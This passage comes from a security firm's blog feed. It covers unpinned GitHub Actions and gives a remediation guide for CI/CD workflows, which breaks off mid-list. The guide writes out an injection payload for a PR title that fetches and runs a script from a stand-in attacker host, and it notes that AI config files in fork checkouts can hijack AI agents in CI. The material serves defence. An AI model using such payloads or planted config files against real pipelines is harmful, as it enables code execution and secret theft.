&lt;p&gt;This creates a recursive supply chain problem. You might SHA-pin the action you depend on, but if that action’s own CI/CD pipeline uses unpinned dependencies, the chain of trust has no foundation. Compromising one of these foundational tools doesn’t just affect that repo - it affects every Action built and tested with it, and every repo that uses those Actions.&lt;/p&gt; 
&lt;p&gt;It’s turtles all the way down. The full &lt;a href="https://www.vigilantdefense.com/research/cicd-chain-attack-anatomy-recon-to-exfiltration"&gt;chain attack anatomy&lt;/a&gt; shows how each link in this recursive chain becomes an entry point for exploitation.&lt;/p&gt; 
&lt;h2&gt;New-Gen Tooling - Already Unpinned&lt;/h2&gt; 
&lt;p&gt;The newest generation of developer tooling is repeating every mistake:&lt;/p&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th&gt;Action&lt;/th&gt; 
   &lt;th&gt;Total Repos&lt;/th&gt; 
   &lt;th&gt;Growth Signal&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;astral-sh/setup-uv&lt;/td&gt; 
   &lt;td&gt;276&lt;/td&gt; 
   &lt;td&gt;Python’s fastest-growing package manager&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;oven-sh/setup-bun&lt;/td&gt; 
   &lt;td&gt;195&lt;/td&gt; 
   &lt;td&gt;Bun runtime setup&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;anthropics/claude-code-action&lt;/td&gt; 
   &lt;td&gt;175&lt;/td&gt; 
   &lt;td&gt;AI code review - nearly doubled during our scan&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;p&gt;astral-sh/setup-uv has accumulated 276 unpinned references across 12 different version tags in the short time since uv exploded in the Python ecosystem. oven-sh/setup-bun is at 195 repos with zero SHA pinning. The ecosystem hasn’t learned from Docker, codecov, or dtolnay - every new tool that gains traction immediately becomes an unpinned supply chain dependency.&lt;/p&gt; 
&lt;p&gt;anthropics/claude-code-action is particularly notable - it nearly doubled from 77 repos at our 40% scan mark to 175 at completion. AI tools in CI/CD are being adopted faster than security awareness can follow. The implications of AI agents in CI/CD pipelines - and the novel attack surfaces they create - are covered in &lt;a href="https://www.vigilantdefense.com/research/ai-agents-cicd-supply-chain-force-multipliers"&gt;AI Agents as Force Multipliers&lt;/a&gt;.&lt;/p&gt; 
&lt;h2&gt;The Zombie Supply Chain&lt;/h2&gt; 
&lt;img src="https://vigilantdefense.com/hubfs/articles/cicd-research/images/14-zombie-supply-chain.png" alt="The Zombie Supply Chain - Abandoned Repos With Active Vulnerabilities" style="max-width: 100%; border-radius: 8px;"&gt; 
&lt;p&gt;Not every repo can be fixed. 809 archived repositories in our dataset have vulnerabilities that will never be patched - nobody’s home to accept a pull request. But they still get forked, cloned, and referenced. LibreSpark/LibreTV has 26,944 forks, each carrying 30 vulnerable workflow findings. solana-labs/solana is archived with 4 critical findings and 5,557 forks.&lt;/p&gt; 
&lt;blockquote&gt; 
 &lt;p&gt;26,944 forks x 30 findings + 5,557 forks x 4 findings = 830,548 inherited vulnerabilities from just two archived repositories that will never receive a patch.&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;p&gt;Beyond archived repos, 376 repositories haven’t been pushed to in over a year. 129 haven’t seen activity in two years. These are zombie pipelines - abandoned infrastructure that the ecosystem still trusts, with supply chain dependencies that will never be updated. The long tail of this problem is explored in &lt;a href="https://www.vigilantdefense.com/research/fixing-50k-repos-automated-pull-requests"&gt;What’s Next - Fixing 50K Repos&lt;/a&gt;.&lt;/p&gt; 
&lt;h2&gt;Why Dependabot Isn’t Solving This&lt;/h2&gt; 
&lt;p&gt;GitHub ships Dependabot with built-in support for SHA pinning GitHub Actions. Adding a few lines to &lt;code&gt;.github/dependabot.yml&lt;/code&gt; configures automatic SHA pin updates. The tooling exists. The adoption is near zero.&lt;/p&gt; 
&lt;p&gt;The reasons are structural, not technical. SHA-pinned action references are ugly - a 40-character hex string instead of a clean &lt;code&gt;@v4&lt;/code&gt;. Developers prioritize readability. GitHub’s own documentation examples use version tags, not SHA pins. The starter-workflows repository - the templates new users clone - uses version tags. The ecosystem teaches the insecure pattern by default.&lt;/p&gt; 
&lt;p&gt;Runner Guard’s autofix engine resolves this mechanically: it replaces every mutable tag with its current SHA, adds a version comment for readability, and outputs a workflow file that looks almost identical but is now immutable. The &lt;a href="https://www.vigilantdefense.com/research/fix-cicd-security-sha-pinning-least-privilege"&gt;Fix It guide&lt;/a&gt; walks through the complete process.&lt;/p&gt; 
&lt;h2&gt;What You Can Do About It&lt;/h2&gt; 
&lt;ol&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;SHA-pin every third-party action.&lt;/strong&gt; Run &lt;code&gt;runner-guard scan .&lt;/code&gt; to find every unpinned reference, then &lt;code&gt;runner-guard fix .&lt;/code&gt; to resolve them to SHA pins automatically.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Configure Dependabot for GitHub Actions.&lt;/strong&gt; Add &lt;code&gt;github-actions&lt;/code&gt; to your &lt;code&gt;.github/dependabot.yml&lt;/code&gt; ecosystem list. Dependabot will submit PRs when new versions are available, keeping your SHA pins current without manual tracking.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Audit your single-maintainer dependencies.&lt;/strong&gt; If your CI/CD pipeline depends on an action maintained by a single person, treat that as a risk factor - not a deal-breaker, but something that belongs in your threat model.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Eliminate @master/@main references immediately.&lt;/strong&gt; These are the highest-risk action references in the ecosystem. At minimum, pin to a version tag. Ideally, pin to a SHA.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Watch for version sprawl.&lt;/strong&gt; If your organization uses the same action across multiple repos with different version tags, consolidate. Each unique mutable ref is a separate trust decision that nobody is tracking.&lt;/p&gt; &lt;/li&gt; 
&lt;/ol&gt; 
&lt;p&gt;The supply chain crisis isn’t a technology problem. The fix exists and takes minutes. It’s an awareness problem - 143,616 findings across GitHub’s top 50K repos, and the solution is a command that runs in under a second.&lt;/p&gt; 
&lt;p&gt;But here’s the uncomfortable truth: a one-time fix isn’t enough. You SHA-pin today, and tomorrow a developer adds a new action with a mutable tag. The supply chain degrades continuously. Point-in-time scanning catches the current state. &lt;a href="https://www.vigilantdefense.com/research/cicd-security-continuous-monitoring-beyond-snapshots"&gt;Continuous monitoring&lt;/a&gt; catches the drift. The supply chain crisis will keep recurring until the ecosystem shifts from reactive scanning to continuous pipeline security - treating CI/CD configurations with the same rigor we apply to production infrastructure.&lt;/p&gt;  
&lt;p&gt;&lt;strong&gt;Scan your repos today.&lt;/strong&gt; &lt;a href="https://www.vigilantdefense.com/resources/runner-guard"&gt;Runner Guard&lt;/a&gt; is Vigilant’s free, open-source CI/CD security scanner - the same tool that powered this research. Install it in under a minute:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-bash"&gt;brew install Vigilant-LLC/tap/runner-guard
runner-guard scan github.com/owner/repo
&lt;/code&gt;&lt;/pre&gt; 
&lt;div class="v-cta-buttons"&gt;
 &lt;a href="https://github.com/Vigilant-LLC/runner-guard" class="v-btn v-btn-primary"&gt;Install Runner Guard&lt;/a&gt;
 &lt;a href="https://www.vigilantdefense.com" class="v-btn v-btn-secondary"&gt;Learn More About Vigilant&lt;/a&gt;
&lt;/div&gt; 
&lt;p&gt;14 security rules. Zero configuration. One command.&lt;/p&gt;  
&lt;div style="margin: 2.5rem 0 1.5rem; padding: 2rem; background: #F8FAFB; border-radius: 12px; border: 1px solid #E8ECF0;"&gt; 
 &lt;div style="display: flex; gap: 1.5rem; align-items: flex-start; flex-wrap: wrap;"&gt;
  &lt;img src="https://vigilantdefense.com/hubfs/Marketing_Assets/Headshot/ChrisNyhuis_Headshot.jpg" alt="Chris Nyhuis" style="width: 80px; height: 80px; border-radius: 50%; object-fit: cover; object-position: center top; flex-shrink: 0;"&gt; 
  &lt;div style="flex: 1; min-width: 240px;"&gt; 
   &lt;div style="font-weight: bold; font-size: 1.15rem; color: #07161d; margin-bottom: 0.25rem;"&gt;
    Chris Nyhuis
   &lt;/div&gt; 
   &lt;div style="font-size: 0.85rem; color: #00a19b; font-weight: 600; margin-bottom: 0.75rem;"&gt;
    CEO, Vigilant
   &lt;/div&gt; 
   &lt;p style="font-size: 0.9375rem; line-height: 1.7; color: #2d3748; margin-bottom: 1rem;"&gt;CEO of Vigilant, a global cybersecurity firm he has led for 16 years. 30+ years of experience across offensive security, SCADA/IoT, and critical infrastructure defense. Holds multiple patents including Forensically Validated Detection Systems and Secure Protocol Translation. Former instructor at a US intelligence school. Certified human trafficking investigator and OSINT practitioner. Vigilant dedicates 25% of profits to combating human trafficking, child exploitation, and supporting orphan care worldwide.&lt;/p&gt; 
   &lt;div style="display: flex; gap: 1.25rem; align-items: center; flex-wrap: wrap;"&gt;
    &lt;a href="https://www.linkedin.com/in/chris-nyhuis-34427550/" style="color: #6b7280; text-decoration: none; font-size: 0.85rem; font-weight: 600;"&gt;LinkedIn&lt;/a&gt; 
    &lt;span style="color: #d1d5db;"&gt;·&lt;/span&gt; 
    &lt;a href="https://twitter.com/vigilance_one" style="color: #6b7280; text-decoration: none; font-size: 0.85rem; font-weight: 600;"&gt;X / Twitter&lt;/a&gt; 
    &lt;span style="color: #d1d5db;"&gt;·&lt;/span&gt; 
    &lt;a href="https://instagram.com/chris.nyhuis" style="color: #6b7280; text-decoration: none; font-size: 0.85rem; font-weight: 600;"&gt;Instagram&lt;/a&gt;
   &lt;/div&gt; 
  &lt;/div&gt; 
 &lt;/div&gt; 
&lt;/div&gt; 
&lt;p style="font-size: 0.9375rem; color: #6b7280; margin: 1.5rem 0; text-align: center; font-style: italic;"&gt;Subscribe to get Vigilant's latest security research delivered to your inbox.&lt;/p&gt; 
&lt;div class="v-related"&gt; 
 &lt;h2&gt;Related Articles&lt;/h2&gt; 
 &lt;ul&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/docker-chokepoint-github-actions-supply-chain"&gt;The Docker Chokepoint - One Org, Six Actions, Thousands of Pipelines&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/cicd-chain-attack-anatomy-recon-to-exfiltration"&gt;Anatomy of a CI/CD Chain Attack - From Recon to Exfiltration in 5 Steps&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/fixing-50k-repos-automated-pull-requests"&gt;What’s Next - Fixing 50K Repos, One PR at a Time&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/fix-cicd-security-sha-pinning-least-privilege"&gt;Fix It - SHA Pinning, Least Privilege, and the 5-Minute Security Upgrade&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/cicd-security-continuous-monitoring-beyond-snapshots"&gt;Beyond Snapshots - Why CI/CD Security Needs Continuous Monitoring&lt;/a&gt;&lt;/li&gt; 
 &lt;/ul&gt; 
&lt;/div&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=45116655&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fvigilantdefense.com%2Fresearch%2Fsupply-chain-crisis-unpinned-github-actions&amp;amp;bu=https%253A%252F%252Fvigilantdefense.com%252Fresearch&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>Github</category>
      <category>Supply-Chain</category>
      <category>CICD</category>
      <pubDate>Tue, 24 Mar 2026 18:14:52 GMT</pubDate>
      <author>sales@vigilantnow.com (Chris Nyhuis)</author>
      <guid>https://vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions</guid>
      <dc:date>2026-03-24T18:14:52Z</dc:date>
    </item>
    <item>
      <title>Fix It — SHA Pinning, Least Privilege, and the 5-Minute Security Upgrade</title>
      <link>https://vigilantdefense.com/research/fix-cicd-security-sha-pinning-least-privilege</link>
      <description>&lt;div&gt; 
 &lt;div style="font-weight: bold; font-size: 1rem; color: #07161d;"&gt;
  Chris Nyhuis
 &lt;/div&gt; 
 &lt;div style="font-size: 0.85rem; color: #6b7280; font-weight: 500;"&gt;
  CEO, Vigilant
 &lt;/div&gt; 
 &lt;div style="font-size: 0.8rem; color: #9ca3af; font-weight: 500;"&gt;
  14 min read
 &lt;/div&gt; 
&lt;/div&gt;</description>
      <content:encoded>&lt;div&gt; 
 &lt;div style="font-weight: bold; font-size: 1rem; color: #07161d;"&gt;
  Chris Nyhuis
 &lt;/div&gt; 
 &lt;div style="font-size: 0.85rem; color: #6b7280; font-weight: 500;"&gt;
  CEO, Vigilant
 &lt;/div&gt; 
 &lt;div style="font-size: 0.8rem; color: #9ca3af; font-weight: 500;"&gt;
  14 min read
 &lt;/div&gt; 
&lt;/div&gt;  
&lt;div style="font-size: 0.85rem; color: #00a19b; font-style: italic; margin-bottom: 1.5rem;"&gt;
 Part of a 9-part research series on CI/CD pipeline security. 
 &lt;a href="#related-articles" style="color: #ff5d2c; text-decoration: none;"&gt;See all articles below.&lt;/a&gt;
&lt;/div&gt; 
&lt;blockquote&gt; 
 &lt;p&gt;246,496 findings in our dataset are auto-fixable. The vast majority can be resolved in under five minutes. The fix isn’t hard. The problem is nobody’s doing it.&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;h2&gt;The Setup&lt;/h2&gt; 
&lt;p&gt;Every article in this series - from the &lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan"&gt;pillar findings&lt;/a&gt; to the &lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;supply chain crisis&lt;/a&gt;, the &lt;a href="https://www.vigilantdefense.com/research/docker-chokepoint-github-actions-supply-chain"&gt;Docker chokepoint&lt;/a&gt;, the &lt;a href="https://www.vigilantdefense.com/research/cicd-chain-attack-anatomy-recon-to-exfiltration"&gt;chain attack anatomy&lt;/a&gt;, the &lt;a href="https://www.vigilantdefense.com/research/ai-agents-cicd-supply-chain-force-multipliers"&gt;AI force multiplier&lt;/a&gt;, and the &lt;a href="https://www.vigilantdefense.com/research/language-risk-matrix-rust-repos-cicd-security"&gt;language risk matrix&lt;/a&gt; - describes a problem that has a fix. Most of those fixes are mechanical. They don’t require architectural changes, security expertise, or budget. They require running a command and merging a PR.&lt;/p&gt; 
&lt;p&gt;This article is the solutions hub. For every finding class Vigilant’s Runner Guard detects, here’s what it means and exactly how to fix it.&lt;/p&gt; 
&lt;p&gt;Having spent over three decades in cybersecurity - including years of red team engagements where we weaponized these exact CI/CD attack chains against banks, government agencies, and critical infrastructure - the most frustrating part of this research isn’t the vulnerability count. It’s how simple the fixes are. The gap between the scale of the problem (192,776 findings across 20,265 repos) and the effort required to fix it (minutes per repo, often automated) is the single most important data point in this entire series.&lt;/p&gt; 
&lt;p&gt;The following fixes are ordered from highest-impact to most nuanced. If you do nothing else, do the first two.&lt;/p&gt; 
&lt;h2&gt;The 5-Minute Fixes&lt;/h2&gt; 
&lt;h3&gt;SHA Pinning (RGS-007)&lt;/h3&gt; 
&lt;p&gt;&lt;strong&gt;The problem:&lt;/strong&gt; 143,616 findings. 74.5% of everything. Your workflow references a third-party action using a mutable version tag - &lt;code&gt;uses: actions/checkout@v4&lt;/code&gt; - that can be silently moved to point at different code.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt;&lt;/p&gt; 
&lt;p&gt;Replace the mutable tag with the commit SHA of the version you’re currently using:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-yaml"&gt;# Before - vulnerable
- uses: actions/checkout@v4

# After - secure
- uses: actions/checkout@b4ffde65f46306985a776297c42c35f57d091244 # v4.2.2
&lt;/code&gt;&lt;/pre&gt; 
&lt;p&gt;The version comment after the &lt;code&gt;#&lt;/code&gt; preserves readability. The SHA is immutable - it cannot be moved or modified. If the action maintainer pushes a new version, your workflow keeps running the exact code you reviewed.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Automated fix:&lt;/strong&gt; Runner Guard does this automatically:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-bash"&gt;runner-guard fix .
&lt;/code&gt;&lt;/pre&gt; 
&lt;p&gt;This resolves every mutable action reference in your workflow files to its current SHA, adding version comments. Review the diff and commit.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Keeping pins current:&lt;/strong&gt; SHA pins need maintenance - when new versions are released, you should update. Add GitHub Actions to your Dependabot configuration:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-yaml"&gt;# .github/dependabot.yml
version: 2
updates:
  - package-ecosystem: "github-actions"
    directory: "/"
    schedule:
      interval: "weekly"
&lt;/code&gt;&lt;/pre&gt; 
&lt;p&gt;Dependabot will submit PRs when new versions are available, keeping your SHA pins current without manual tracking. This is the single most impactful security configuration you can add to a repo.&lt;/p&gt; 
&lt;h3&gt;Permission Scoping (RGS-008)&lt;/h3&gt; 
&lt;p&gt;&lt;strong&gt;The problem:&lt;/strong&gt; 11,658 findings across 7,236 repos. Workflows grant &lt;code&gt;write-all&lt;/code&gt; or don’t specify permissions (which defaults to write access for most token scopes). A compromised action with write permissions can push code to your repository, create releases, and modify issues and PRs.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt;&lt;/p&gt; 
&lt;p&gt;Add explicit permission scoping to each job:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-yaml"&gt;# Before - vulnerable (implicit write-all)
jobs:
  build:
    runs-on: ubuntu-latest

# After - secure (explicit minimum permissions)
jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: read
&lt;/code&gt;&lt;/pre&gt; 
&lt;p&gt;For workflows that need write access to specific resources, grant only what’s needed:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-yaml"&gt;permissions:
  contents: read
  pull-requests: write  # Only if the job needs to comment on PRs
&lt;/code&gt;&lt;/pre&gt; 
&lt;p&gt;&lt;strong&gt;The principle:&lt;/strong&gt; Start with &lt;code&gt;permissions: read-all&lt;/code&gt; at the workflow level and add specific write permissions per job as needed. Never use &lt;code&gt;permissions: write-all&lt;/code&gt; unless you can justify every scope.&lt;/p&gt; 
&lt;h3&gt;Input Validation (RGS-001, RGS-002, RGS-003)&lt;/h3&gt; 
&lt;p&gt;&lt;strong&gt;The problem:&lt;/strong&gt; 14,014 combined findings. Untrusted input from PR titles, issue bodies, branch names, and commit messages flows directly into shell commands via expression interpolation. An attacker submitting a PR with a title like &lt;code&gt;"; curl attacker.com/steal | sh; echo "&lt;/code&gt; gets arbitrary code execution in your CI runner.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt;&lt;/p&gt; 
&lt;p&gt;Never pass GitHub context variables directly into &lt;code&gt;run:&lt;/code&gt; shell commands:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-yaml"&gt;# Before - vulnerable (expression injection)
- run: echo "PR title: $"

# After - secure (environment variable)
- run: echo "PR title: $PR_TITLE"
  env:
    PR_TITLE: $
&lt;/code&gt;&lt;/pre&gt; 
&lt;p&gt;Environment variables are treated as data, not executable code. Shell interpolation can’t escape the variable boundary. This is the same principle as parameterized SQL queries - the fix for SQL injection applies to shell injection.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Attacker-controlled GitHub context variables to watch:&lt;/strong&gt; - &lt;code&gt;github.event.pull_request.title&lt;/code&gt; - &lt;code&gt;github.event.pull_request.body&lt;/code&gt; - &lt;code&gt;github.event.issue.title&lt;/code&gt; - &lt;code&gt;github.event.issue.body&lt;/code&gt; - &lt;code&gt;github.event.comment.body&lt;/code&gt; - &lt;code&gt;github.head_ref&lt;/code&gt; (branch name) - &lt;code&gt;github.event.commits[*].message&lt;/code&gt;&lt;/p&gt; 
&lt;p&gt;Any expression that includes attacker-controlled data must go through an environment variable, never directly into a &lt;code&gt;run:&lt;/code&gt; block.&lt;/p&gt; 
&lt;h2&gt;The Deeper Fixes&lt;/h2&gt; 
&lt;h3&gt;Trigger Safety (RGS-004, RGS-005, RGS-009)&lt;/h3&gt; 
&lt;p&gt;&lt;strong&gt;The problem:&lt;/strong&gt; 9,987 combined findings. Workflows use triggers that give untrusted input elevated access.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;RGS-004 - Comment triggers without auth checks.&lt;/strong&gt; A workflow triggered by &lt;code&gt;issue_comment&lt;/code&gt; runs code in response to any comment - including from accounts with no relationship to the repo. Without an authorization check, anyone on GitHub can trigger your CI.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Fix:&lt;/strong&gt; Add an authorization check:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-yaml"&gt;on:
  issue_comment:
    types: [created]

jobs:
  deploy:
    if: &amp;gt;
      github.event.comment.body == '/deploy' &amp;amp;&amp;amp;
      github.event.comment.author_association == 'MEMBER'
    runs-on: ubuntu-latest
&lt;/code&gt;&lt;/pre&gt; 
&lt;p&gt;&lt;strong&gt;RGS-005 - Excessive permissions on untrusted triggers.&lt;/strong&gt; Workflows triggered by &lt;code&gt;pull_request_target&lt;/code&gt;, &lt;code&gt;issue_comment&lt;/code&gt;, or &lt;code&gt;workflow_run&lt;/code&gt; have access to secrets and write permissions - but process input from potentially untrusted sources.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Fix:&lt;/strong&gt; Use the principle of least privilege. If a workflow processes untrusted input, it should have read-only permissions. If it needs write access (e.g., to post a comment), split it into two jobs: one that processes the untrusted input with read-only access, and one that performs the write action using the first job’s validated output.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;RGS-009 - Unsafe checkout of fork code.&lt;/strong&gt; Workflows using &lt;code&gt;pull_request_target&lt;/code&gt; that check out the PR head (&lt;code&gt;ref: $&lt;/code&gt;) execute untrusted fork code with full secrets access.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Fix:&lt;/strong&gt; Switch to &lt;code&gt;pull_request&lt;/code&gt; trigger (no secrets access) unless you specifically need secrets. If you must use &lt;code&gt;pull_request_target&lt;/code&gt;:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-yaml"&gt;# Safe pattern - checkout the base branch, not the PR head
- uses: actions/checkout@b4ffde65f46... # v4
  with:
    ref: $
&lt;/code&gt;&lt;/pre&gt; 
&lt;h3&gt;Network Safety (RGS-006, RGS-012)&lt;/h3&gt; 
&lt;p&gt;&lt;strong&gt;The problem:&lt;/strong&gt; 5,361 combined findings. Workflows download and execute remote code (&lt;code&gt;curl | sh&lt;/code&gt;) or make network calls in privileged contexts that could exfiltrate data.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;RGS-006 fix:&lt;/strong&gt; Replace curl-pipe-bash with explicit download-then-verify:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-yaml"&gt;# Before - vulnerable
- run: curl -sSL https://example.com/install.sh | bash

# After - secure
- run: |
    curl -sSL -o install.sh https://example.com/install.sh
    sha256sum -c &amp;lt;&amp;lt;&amp;lt; "expected_hash  install.sh"
    bash install.sh
&lt;/code&gt;&lt;/pre&gt; 
&lt;p&gt;Better yet, replace remote scripts with action-based alternatives that can be SHA-pinned.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;RGS-012 fix:&lt;/strong&gt; Audit network calls in privileged workflows. Any &lt;code&gt;curl&lt;/code&gt;, &lt;code&gt;wget&lt;/code&gt;, or network operation in a workflow with secrets access should be reviewed for exfiltration risk. If the workflow doesn’t need network access, consider running it in a restricted environment.&lt;/p&gt; 
&lt;h3&gt;OIDC Over Secrets for Cloud Auth&lt;/h3&gt; 
&lt;p&gt;Beyond the specific RGS rules, there’s a broader pattern worth addressing: how your CI/CD authenticates with cloud providers.&lt;/p&gt; 
&lt;p&gt;The traditional approach stores long-lived credentials (AWS access keys, GCP service account keys, Azure connection strings) as GitHub Actions secrets. These credentials exist indefinitely, can be exfiltrated by any compromised action with secrets access, and create a permanent lateral movement path from CI to cloud infrastructure.&lt;/p&gt; 
&lt;p&gt;The better approach uses GitHub’s OIDC (OpenID Connect) provider for cloud authentication. OIDC generates short-lived, scoped tokens for each workflow run - no stored credentials to steal.&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-yaml"&gt;# Before - stored credentials (vulnerable to exfiltration)
- uses: aws-actions/configure-aws-credentials@v4
  with:
    aws-access-key-id: $
    aws-secret-access-key: $

# After - OIDC (short-lived, nothing to steal)
permissions:
  id-token: write
  contents: read
jobs:
  deploy:
    - uses: aws-actions/configure-aws-credentials@v4
      with:
        role-to-assume: arn:aws:iam::123456789:role/github-actions
        aws-region: us-east-1
&lt;/code&gt;&lt;/pre&gt; 
&lt;p&gt;OIDC is supported by AWS, GCP, Azure, and HashiCorp Vault. If your CI/CD accesses cloud resources, switching from stored credentials to OIDC is one of the highest-impact security improvements you can make - and it eliminates the most dangerous lateral movement path in the &lt;a href="https://www.vigilantdefense.com/research/cicd-chain-attack-anatomy-recon-to-exfiltration"&gt;chain attack model&lt;/a&gt;.&lt;/p&gt; 
&lt;h3&gt;Debug Logging (RGS-015)&lt;/h3&gt; 
&lt;p&gt;&lt;strong&gt;The problem:&lt;/strong&gt; 302 findings. Workflows with debug logging enabled (&lt;code&gt;ACTIONS_STEP_DEBUG: true&lt;/code&gt; or &lt;code&gt;ACTIONS_RUNNER_DEBUG: true&lt;/code&gt;) expose sensitive information in CI logs - environment variables, token values, internal paths, and API responses that are normally masked.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; Remove debug logging from production workflows. If you need debug output temporarily, enable it through GitHub’s repository settings (Settings &amp;gt; Secrets and Variables &amp;gt; Variables) rather than hardcoding it in the workflow file, and disable it after debugging.&lt;/p&gt; 
&lt;h3&gt;AI Config Safety (RGS-010, RGS-011)&lt;/h3&gt; 
&lt;p&gt;&lt;strong&gt;The problem:&lt;/strong&gt; 5 findings - small in number but novel in category. AI configuration files (CLAUDE.md, .cursorrules, copilot-instructions.md) in fork checkouts can hijack AI agents running in CI.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;Fix:&lt;/strong&gt; If using AI-powered PR review actions: 1. Run them on &lt;code&gt;pull_request&lt;/code&gt; (sandboxed, no secrets) rather than &lt;code&gt;pull_request_target&lt;/code&gt; 2. If &lt;code&gt;pull_request_target&lt;/code&gt; is required, do NOT check out the PR head 3. Add explicit authorization checks before running AI review on fork PRs 4. Treat AI config files from untrusted sources as executable code - they control the AI’s behavior&lt;/p&gt; 
&lt;h2&gt;The Automation Story&lt;/h2&gt; 
&lt;p&gt;Manual remediation doesn’t scale. 50K repos times 14 rules times multiple workflow files - the math doesn’t work.&lt;/p&gt; 
&lt;p&gt;Runner Guard’s automated pipeline:&lt;/p&gt; 
&lt;ol&gt; 
 &lt;li&gt;&lt;strong&gt;Scan:&lt;/strong&gt; &lt;code&gt;runner-guard scan .&lt;/code&gt; identifies every finding with rule ID, file, line number, and severity&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;Fix:&lt;/strong&gt; &lt;code&gt;runner-guard fix .&lt;/code&gt; resolves fixable findings automatically (currently SHA-pinning for RGS-007)&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;PR:&lt;/strong&gt; Generate a pull request with the changes, including explanations of what was found and why the fix matters&lt;/li&gt; 
&lt;/ol&gt; 
&lt;p&gt;This is the pipeline we’re using for our &lt;a href="https://www.vigilantdefense.com/research/fixing-50k-repos-automated-pull-requests"&gt;50K repo remediation campaign&lt;/a&gt; - scanning at scale, generating fixes, submitting PRs. The same pipeline works for individual repos and for organizations with hundreds of repositories.&lt;/p&gt; 
&lt;h2&gt;The Single-Maintainer Mitigation&lt;/h2&gt; 
&lt;p&gt;Several articles in this series highlight the &lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;single-maintainer problem&lt;/a&gt;: critical CI infrastructure depending on one person’s GitHub account. SHA pinning is the primary mitigation, but additional steps help:&lt;/p&gt; 
&lt;ol&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Fork and maintain internally.&lt;/strong&gt; For critical actions (dtolnay/rust-toolchain if you’re a Rust shop, shivammathur/setup-php if you’re PHP), consider forking and maintaining your own copy. You control the tags.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Monitor maintainer activity.&lt;/strong&gt; If a single-maintainer action goes dormant - no commits in months, issues piling up - that’s a risk signal. The maintainer may have lost interest, or worse, their account may be vulnerable to takeover.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Contribute to alternatives.&lt;/strong&gt; The single-maintainer problem is ultimately a community problem. Contributing to multi-maintainer alternatives (or adding maintainers to existing projects) reduces the concentration.&lt;/p&gt; &lt;/li&gt; 
&lt;/ol&gt; 
&lt;h2&gt;Organization-Wide Rollout&lt;/h2&gt; 
&lt;p&gt;For organizations with dozens or hundreds of repos, the fix-per-repo approach doesn’t scale. Here’s the org-level playbook:&lt;/p&gt; 
&lt;ol&gt; 
